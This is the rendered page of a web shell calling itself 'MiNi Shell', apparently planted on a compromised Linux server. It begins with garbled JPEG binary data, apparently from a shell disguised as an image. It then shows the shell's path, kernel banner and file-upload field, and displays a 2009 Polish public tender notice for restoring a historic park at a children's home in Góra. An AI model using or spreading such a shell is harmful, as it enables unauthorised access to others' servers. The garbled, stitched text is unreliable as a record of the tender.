JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353882-N-2009.html

<p class="kh_header"><b>Jarocin: Rewaloryzacja parku zabytkowego na terenie Domu Dziecka w Górze - etap IV</b><br>
<b>Numer ogłoszenia: 353882 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jarociński , al. Niepodległości 10-12, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472920, faks 062 7473337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-jarocinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewaloryzacja parku zabytkowego na terenie Domu Dziecka w Górze - etap IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rewaloryzacja parku zabytkowego na terenie Domu Dziecka w Górze  - etap IV 
obejmujący:

Zadanie 1 -	Nasadzenie 16 szt. cisów wokół kwater kwiatowych - formy topiarowe                             (stożek)
Zadanie 2 -  Wykonanie nawierzchni żwirowej (wraz z podbudową) wokół kwater                                kwiatowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 45.23.31.61-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
       1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
	ustawy nakładają obowiązek posiadania takich uprawnień,
       2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
       3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie            zamówienia,
       4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
            art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający sie o udzielenie niniejszego zamówienia muszą spełniać stawiane im warunki oraz przedłożyć następujące dokumenty potwierdzające spełnienie tych warunków:
1.1. Wykonawca posiada uprawnienia do wykonywania określonej działalności lub 
   czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy - Prawo
   zamówień publicznych, Zamawiający żąda załączenia do oferty następujących
  dokumentów:
a. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty przez Wykonawców występujących wspólnie, ww dokument musi być złożony przez każdego Wykonawcę wchodzącego w skład podmiotu  występującego wspólnie.
  b. Aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego          potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat lub 
      zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie       względnie  rozłożenie na raty zaległych płatności lub wstrzymanie w całości       wykonania decyzji Naczelnika Urzędu Skarbowego, wystawionych nie wcześniej       niż 3 miesiące przed   upływem terminu składania ofert.
	
      W przypadku składania oferty przez Wykonawców występujących wspólnie
      zaświadczenie musi być złożone przez każdego Wykonawcę wchodzącego w skład 
      podmiotu występującego wspólnie.
c. Aktualnego zaświadczenia z właściwego oddziału Zakładu Ubezpieczeń 
    Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, 
    że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i
    społeczne względnie zaświadczenia, że uzyskał przewidziane prawem zwolnienie,
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
    wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące
    przed upływem terminu składania ofert.
	W przypadku składania oferty przez wykonawców występujących wspólnie -
zaświadczenie musi być złożone przez każdego Wykonawcę wchodzącego w skład podmiotu występującego wspólnie.

         1.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1.1. składa                 dokument lub dokumenty wystawione w kraju, w którym ma  siedzibę lub miejsce                 zamieszkania, potwierdzające odpowiednio, że:
    a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
    b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie 
        społeczne i zdrowotne albo, że uzyskał prawem przewidziane zwolnienie, 
        odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
        wykonania decyzji  właściwego organu.
        1.3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę
               lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1.2 
    należy  zastąpić je dokumentem zawierającym oświadczenie złożone przed                notariuszem, właściwym organem sądowym, administracyjnym albo organem  	   samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia                    osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

       1.4. Dokumenty, o których mowa w pkt 1.2. lit. a  powinny być wystawione nie                wcześniej niż 6  miesięcy przed upływem terminu składania ofert. 
   Dokument, o którym mowa w pkt 1.2. lit. b, powinien być wystawiony nie       wcześniej niż 3 miesiące przed upływem terminu składania ofert.

	Wymagane dokumenty należy przedstawić w formie oryginałów lub kopii. Dokumenty złożone w formie kopii muszą być opatrzone klauzulą za zgodność z oryginałem i poświadczone za zgodność z oryginałem przez Wykonawcę. 
Zamawiający zażąda przedstawienia oryginału dokumentu każdorazowo, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

        2. Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda załączenia do oferty:
a/ wykazu co najmniej jednej wykonanej, a w przypadku świadczeń okresowych lub 
    ciągłych również wykonywanej usługi w  okresie ostatnich 3 lat przed dniem 
    wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
    działalności jest  krótszy - w tym okresie, pracy rewaloryzacyjnej w parku 
    zabytkowym obejmującej nasadzenia roślin o wartości nie mniejszej niż 15.000 zł     brutto z podaniem jej wartości, przedmiotu, daty i miejsca wykonania oraz     załączenia dokumentów potwierdzających, że  usługa została wykonana należycie.
	    W przypadku składania oferty przez wykonawców występujących wspólnie w/w 
 	    warunek zamawiający uzna za spełniony, gdy wykonawcy występujący wspólnie 
    przedłożą wykaz wykonanej, a w przypadku świadczeń okresowych lub ciągłych 
    również wykonywanej usługi w okresie ostatnich trzech lat przed  dniem wszczęcia 
    postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
    krótszy - w tym okresie co najmniej jednej pracy  rewaloryzacyjnej w parku 
    zabytkowym obejmującej nasadzenia roślin o wartości nie mniejszej niż 15.000 zł     brutto łącznie z podaniem jej wartości, przedmiotu, daty i miejsca wykonania oraz      załączenia dokumentów potwierdzających, że  usługa ta została wykonana     należycie.

	Do wykazu /załącznik nr 1 do oferty/ należy dołączyć dokumenty   potwierdzające, że usługa ta została wykonana należycie.

b/ wykazu osób, przy pomocy których wykonywany będzie przedmiot zamówienia         posiadających wykształcenie, kwalifikacje i doświadczenie zawodowe niezbędne do 
    wykonania zamówienia określone przepisami rozporządzenia Ministra Kultury z 
   dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich,        restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych,
   a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań
   archeologicznych i poszukiwań   ukrytych lub porzuconych zabytków ruchomych 
   (Dz.U. Nr 150, poz. 1579).

UWAGA!

 Zgodnie z przepisami ww rozporządzenia:
        1) pracami konserwatorskimi lub pracami restauratorskimi polegającymi na 
zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej mogą kierować osoby, które posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów, obejmujących wiadomości w tym zakresie, oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków (§ 8 ust. 3 ww rozporządzenia),
	       2) prace o charakterze technicznym w zakresie, o którym mowa w pkt 1 mogą być
prowadzone przez osoby, które posiadają średnie wykształcenie w zakresie 
pielęgnacji zieleni albo odbyły co najmniej 12 miesięczną praktykę zawodową
przy pielęgnacji tego rodzaju zabytków (§ 8 ust. 4),
	       3) osoby, które uzyskały zaświadczenie o kwalifikacjach na podstawie § 19 
rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie 
zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz.U. Nr 31, poz. 197) oraz §17-19 rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz.U. Nr 16, poz.55), zachowują uprawnienia wskazane w tym zaświadczeniu w dotychczasowym zakresie w odniesieniu do prac konserwatorskich i robót budowlanych w rozumieniu niniejszego rozporządzenia (§ 13 ww rozporządzenia).

Do wykazu /załącznik nr 2 do oferty/ należy dołączyć dokumenty potwierdzające
powyższe wymogi.

        3. Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
wykonanie zamówienia, Zamawiający żąda załączenia do oferty  polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej.
    
	Ponadto niezbędnymi dokumentami, które muszą złożyć podmioty występujące w niniejszym postępowaniu są:
a.	Oświadczenie /załącznik nr 3 do oferty/ informujące, że Wykonawca spełnia 
warunki zawarte w art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz, 
że nie jest wykluczony z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
	W przypadku składania oferty przez podmioty występujące wspólnie oświadczenie winno być podpisane przez uprawnionego przedstawiciela (pełnomocnika).  

            b.  Zgodnie z art. 23 ust. 2 ustawy - Prawo zamówień publicznych, Wykonawcy 
     ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić pełnomocnika
     do  reprezentowania ich w postępowaniu o udzielenie zamówienia albo do 
     reprezentowania ich w postępowaniu i zawarcia umowy.
     Do oferty należy dołączyć stosowne pełnomocnictwo podpisane przez osoby 
     upoważnione do składania oświadczeń woli każdego z Wykonawców wspólnie 
     ubiegających się o udzielenie zamówienia. Pełnomocnictwo powinno mieć formę 
     oryginału względnie poświadczonej notarialnie kopii.
     	W przypadku dokonania wyboru oferty Wykonawcy występującego wspólnie, 
przed przystąpieniem do zawarcia umowy o udzielenie zamówienie publicznego   Zamawiający może zażądać umowy regulującej współpracę Wykonawców występujących wspólnie. Termin na jaki zostanie zawarta umowa regulująca współpracę Wykonawców występujących wspólnie nie może być krótszy od terminu określonego na wykonanie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-jarocinski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, Al. Niepodległości 10-12, 63-200 Jarocin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: Starostwo Powiatowe (Biuro Obsługi Klienta), Al. Niepodległości 10-12; 63-200 Jarocin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com